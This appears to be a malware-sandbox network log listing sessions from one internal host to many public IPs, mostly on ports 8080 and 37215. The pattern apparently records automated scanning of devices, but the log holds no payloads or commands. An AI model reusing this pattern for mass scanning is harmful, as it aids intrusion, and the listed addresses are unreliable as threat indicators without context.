                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15938192.168.2.2343800153.176.125.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15939192.168.2.234508632.226.97.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15940192.168.2.2348712111.173.122.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15941192.168.2.233721618.215.24.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15942192.168.2.2339256154.211.237.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15943192.168.2.2345162217.64.114.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15944192.168.2.235003042.167.111.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15945192.168.2.2335054160.49.243.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15946192.168.2.2344274181.175.209.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15947192.168.2.2350784111.153.26.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15948192.168.2.23404721.154.70.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15949192.168.2.235662074.31.164.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15950192.168.2.234222062.48.91.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15951192.168.2.2348866121.98.162.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15952192.168.2.235037617.49.184.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15953192.168.2.2359130160.245.249.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15954192.168.2.2338232118.7.9.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15955192.168.2.236067245.128.113.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15956192.168.2.2349096112.165.203.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15957192.168.2.2359900202.228.132.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15958192.168.2.233773038.219.194.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15959192.168.2.2340658140.147.155.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15960192.168.2.2350044189.41.206.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15961192.168.2.2360300149.117.181.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15962192.168.2.2351544151.218.226.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15963192.168.2.234736060.207.141.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15964192.168.2.235666812.70.163.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15965192.168.2.23607368.106.176.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15966192.168.2.2345354122.17.127.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15967192.168.2.233629024.91.126.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15968192.168.2.2355256105.14.200.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15969192.168.2.2338282123.89.100.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15970192.168.2.234261832.123.57.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15971192.168.2.233317673.116.150.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15972192.168.2.2337172140.247.149.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15973192.168.2.2333718181.239.157.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15974192.168.2.2351032140.117.119.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15975192.168.2.234215495.170.238.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15976192.168.2.2339762105.207.40.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15977192.168.2.2359116207.87.159.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15978192.168.2.235340065.175.254.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15979192.168.2.2355248149.204.241.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15980192.168.2.2358810168.117.8.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15981192.168.2.2348658223.20.108.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15982192.168.2.23510969.24.240.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15983192.168.2.23546689.181.127.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15984192.168.2.2354236185.106.8.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15985192.168.2.234632437.9.60.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15986192.168.2.234047887.175.37.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15987192.168.2.2352880128.163.137.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15988192.168.2.2335474157.245.15.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15989192.168.2.2337398195.190.56.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15990192.168.2.2344984197.147.96.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15991192.168.2.2345950197.201.162.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15992192.168.2.233610241.11.32.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15993192.168.2.2343932197.218.6.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15994192.168.2.233387088.166.189.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15995192.168.2.2346110157.121.13.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15996192.168.2.2359366197.180.48.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15997192.168.2.234748641.172.4.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15998192.168.2.2333156157.234.160.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15999192.168.2.2351554157.110.109.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16000192.168.2.2333152197.227.57.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16001192.168.2.234744451.75.121.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16002192.168.2.2352924124.90.88.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16003192.168.2.2358958203.189.131.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16004192.168.2.233597077.209.134.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16005192.168.2.2332852101.154.9.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16006192.168.2.236069676.235.159.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16007192.168.2.2352240157.79.74.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16008192.168.2.2349742194.25.223.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16009192.168.2.2349620153.60.135.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16010192.168.2.234559443.148.31.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16011192.168.2.234441038.66.186.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16012192.168.2.233776019.186.119.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16013192.168.2.2345276223.24.37.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16014192.168.2.2357370178.227.247.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16015192.168.2.235847473.227.179.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16016192.168.2.2349638116.27.204.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16017192.168.2.2343392144.60.35.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16018192.168.2.2339818144.27.250.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16019192.168.2.236023090.222.198.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16020192.168.2.2358428114.161.20.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16021192.168.2.2354462174.45.135.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16022192.168.2.23482081.185.139.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16023192.168.2.2336232168.172.4.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16024192.168.2.23578624.173.217.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16025192.168.2.2353428120.207.170.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16026192.168.2.234141070.157.25.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16027192.168.2.234870098.166.176.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16028192.168.2.235078890.231.115.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16029192.168.2.2355208179.106.145.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16030192.168.2.2346094155.55.243.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16031192.168.2.234407651.118.25.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16032192.168.2.2355478193.165.10.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16033192.168.2.2355190192.205.157.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16034192.168.2.234334238.226.163.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16035192.168.2.233460671.203.236.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16036192.168.2.2336932211.209.225.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16037192.168.2.2356850189.34.75.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16038192.168.2.2343362205.92.247.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16039192.168.2.2355820155.155.129.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16040192.168.2.2336662156.62.159.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16041192.168.2.2360206196.234.60.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16042192.168.2.2348058176.182.223.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16043192.168.2.2356594140.38.8.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16044192.168.2.2334856144.43.112.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16045192.168.2.235860052.102.18.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16046192.168.2.2339806183.160.1.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16047192.168.2.2343992220.217.35.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16048192.168.2.2347344126.95.166.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16049192.168.2.2338320114.217.193.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16050192.168.2.2341784136.146.67.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16051192.168.2.2339104198.64.179.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16052192.168.2.2358542158.197.165.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16053192.168.2.2353432196.129.113.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16054192.168.2.2333136186.44.158.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16055192.168.2.2356814205.205.132.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16056192.168.2.2346660212.50.107.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16057192.168.2.2342678212.129.235.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16058192.168.2.235896497.60.110.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16059192.168.2.2360372176.253.3.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16060192.168.2.2348268185.89.204.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16061192.168.2.2344270203.203.252.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16062192.168.2.2359246114.190.5.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16063192.168.2.234554250.14.63.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16064192.168.2.235572078.162.213.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16065192.168.2.233462280.89.146.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16066192.168.2.234330287.104.137.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16067192.168.2.2338168155.13.83.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16068192.168.2.2343314110.156.106.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16069192.168.2.235479213.137.240.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16070192.168.2.2346774108.116.87.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16071192.168.2.2358400196.174.65.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16072192.168.2.2354090202.123.24.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16073192.168.2.2338776200.254.115.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16074192.168.2.235555082.156.28.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16075192.168.2.234567287.92.78.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16076192.168.2.235455224.162.36.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16077192.168.2.235348449.79.49.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16078192.168.2.2347174169.26.112.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16079192.168.2.23535522.56.140.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16080192.168.2.2357970210.143.190.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16081192.168.2.233527091.2.222.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16082192.168.2.234690043.246.47.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16083192.168.2.235250275.143.66.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16084192.168.2.2344686200.247.95.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16085192.168.2.235473086.50.74.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16086192.168.2.2348892134.214.195.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16087192.168.2.236099235.69.129.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16088192.168.2.2342818199.120.112.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16089192.168.2.2334556159.132.208.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16090192.168.2.2356336204.163.71.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16091192.168.2.2346198133.194.32.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16092192.168.2.2349406168.164.99.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16093192.168.2.2337340188.161.109.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16094192.168.2.235958479.19.33.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16095192.168.2.2342754142.39.144.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16096192.168.2.234420699.139.232.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16097192.168.2.2337778154.175.14.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16098192.168.2.234744462.18.159.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16099192.168.2.2349514118.10.141.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16100192.168.2.234237425.136.75.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16101192.168.2.2349820188.144.77.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16102192.168.2.2358528200.193.105.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16103192.168.2.2332830129.210.164.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16104192.168.2.2343764220.120.223.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16105192.168.2.2335196117.65.90.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16106192.168.2.2342074139.230.99.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16107192.168.2.2342626203.102.47.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16108192.168.2.2354486117.98.116.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16109192.168.2.2336018166.106.162.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16110192.168.2.2339854187.27.195.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16111192.168.2.2335110187.93.210.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16112192.168.2.2342058151.71.45.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16113192.168.2.233730436.39.42.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16114192.168.2.234529431.0.94.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16115192.168.2.2351290193.87.154.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16116192.168.2.2358548216.180.219.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16117192.168.2.2335886185.92.66.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16118192.168.2.235855291.179.165.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16119192.168.2.2353308148.195.122.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16120192.168.2.2355076105.210.186.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16121192.168.2.2350538200.231.244.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16122192.168.2.2339826205.113.174.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16123192.168.2.235232246.191.68.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16124192.168.2.2358824166.170.97.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16125192.168.2.233399242.171.192.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16126192.168.2.2346306193.215.72.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16127192.168.2.2337678139.177.60.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16128192.168.2.235993257.206.138.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16129192.168.2.2339582145.127.45.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16130192.168.2.2353946107.82.187.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16131192.168.2.234671666.160.208.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16132192.168.2.2356112203.27.64.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16133192.168.2.235296096.4.143.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16134192.168.2.2347296167.13.42.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16135192.168.2.2351086199.104.175.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16136192.168.2.2340668111.247.64.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16137192.168.2.234771897.52.106.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16138192.168.2.235076812.151.39.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16139192.168.2.235148697.12.167.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16140192.168.2.23409945.127.166.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16141192.168.2.2338382172.98.43.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16142192.168.2.234809299.176.166.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16143192.168.2.235213483.42.16.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16144192.168.2.2350514197.78.114.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16145192.168.2.234130060.61.189.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16146192.168.2.2351478119.123.64.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16147192.168.2.2355266173.104.74.1578080
                                                        TimestampBytes transferredDirectionData


